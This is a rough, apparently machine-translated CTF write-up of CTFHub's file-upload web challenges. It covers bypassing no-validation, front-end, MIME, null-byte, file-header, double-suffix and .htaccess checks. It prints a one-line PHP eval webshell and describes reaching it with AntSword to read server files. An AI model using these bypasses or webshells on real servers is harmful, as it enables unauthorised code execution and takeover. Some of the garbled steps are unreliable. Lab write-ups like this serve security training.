<>CTFHUB( Skill tree web File upload section

File upload vulnerability means that an attacker uploads an executable file to the server and executes it . The files uploaded here can be Trojans , virus , Malicious script or WebShell etc . This attack is the most direct and effective , The technical threshold of some file upload vulnerabilities is very low , It's easy for attackers to implement .

<> No validation

Because there is no check on the uploaded file here

So we upload it directly php file

First write a sentence

In a word, Trojan horse

$_GET[' '],$_POST[' '],$_COOKIE[' ']

Receive the data we send ,

And pass the received data to the function that executes the command in the one sentence Trojan horse , And then execute the command .

Upload the file to the server with browser ,

We can put it together according to the returned address shell Storage address of

Open the ant sword Connect to destination address

One by one out of the background directory

And then you can find out flag It's over

<> Front end verification

Before the file is uploaded , front end js The code validates the file suffix once

Only when it meets the requirements can it be uploaded , So here we are , Change the file suffix okay

Write a sentence passwd.php Change the suffix to png/jpg So the front end passes

Open the web page to upload the file to the browser

Take out burp, Grab a bag . find passwd.png Change to 1.php

So you can see that the upload is successful , Here we can see our pictures shell Storage location for

copy url Throw it to the ant sword , Fill in the password

stay url Fill us in that column shell Storage address

The password just fills in the variable name in the Trojan horse

Add the filled data in Then let's look at file management

You can see that shell stay /upload lower

And then we can do it in the /html We found it in the directory flag

<>MIME limit

When uploading a file , Limit the upload of malicious files by checking the selected file type

It's the same thing

upload , Grab a bag

take Content-Type Change to image/jpeg

Ant sword connection

Find backstage flag

Here we look at the background source code

stay if Statement, we can see that only the file type is limited

So we can also use and js Bypass the same method

First change the document to jpg Then change the suffix

In this way, the file type also meets the requirements

<>00 truncation

0x00 Is the end identifier of a string , The attacker can add string identifier manually to truncate the following content , And the following content can help us to bypass the detection .

<>00 Restrictions on truncation
PHP<5.3.29, And GPC close
This took me a long time , It's mainly because the display on my side has been passed on

But I can't connect it , I always thought it was the environment

The reason was later found

We can see it on the website /?road= ad locum road Is the path where the file is stored

If you don't truncate the path here , It's just truncated in the file name

The system will automatically store your incoming files in the road lower

Although it was successfully passed on, the file name was modified by itself ,

The file suffix will also be changed to yours Content-Type

So we don't just need to truncate the file name , stay road It's going to have to be cut off so that we can find what you've passed on shell

then 00 Cut off whether it is 0x00 still %00 It's all OK

%00 Is decoded by the server as 0x00

There is another point to note Your shell The name is given by

you road It's named after me

With you file name It has nothing to do with it

<> File header check

Header Check When the browser uploads files to the server ,

The server's response to the uploaded file Content-Type Type ,

If it's allowed on the white list , Then it can be uploaded normally , Otherwise, the upload fails

Let's change the header of the previous sentence

open winhex , Change the file header , What is the specific change ( I'm lazy , I don't want to remember )

winhex Open a real image with the same suffix , Copy the first line

Paste the first line to the front of your sentence

As usual upload Repackaging Ant sword obtain flag

<> Double suffixes

Just brush it again upload Repackaging

Upload succeeded Why ? What about my suffix

Now that you've eaten one of my suffixes Then I'll write two

Hey, hey, hey That's OK And then the ant sword obtain flag

actually This question What about it That is, he will filter out the characters in the blacklist

php It's filtered Since he can filter Then we'll do it

Make it usable after filtering payload

<>.htaccess

.htaccess The file is Apache A configuration file in the server , It is responsible for the configuration of web pages in related directories , adopt .htaccess File can realize web page 301 redirect , custom 404 page , Change file extension , allow / Block access to specific users or directories , Forbidden directory list , Configure default document and other functions .

Let's write one first txt file Then change the name of the file to .htaccess

The content is as follows

What does this mean It's the name contain 2 For your files php analysis

That's it We uploaded it 2.png Can be used as php Yes

Let's upload our .gtaccess Then upload 2.png

Let's visit first 2.png

You can see the code ahead It's the header that was copied before and
<?php @eval($_POST['hack']) ?> No display This proves that php It's parsed
Lianyi sword have to flag

Technology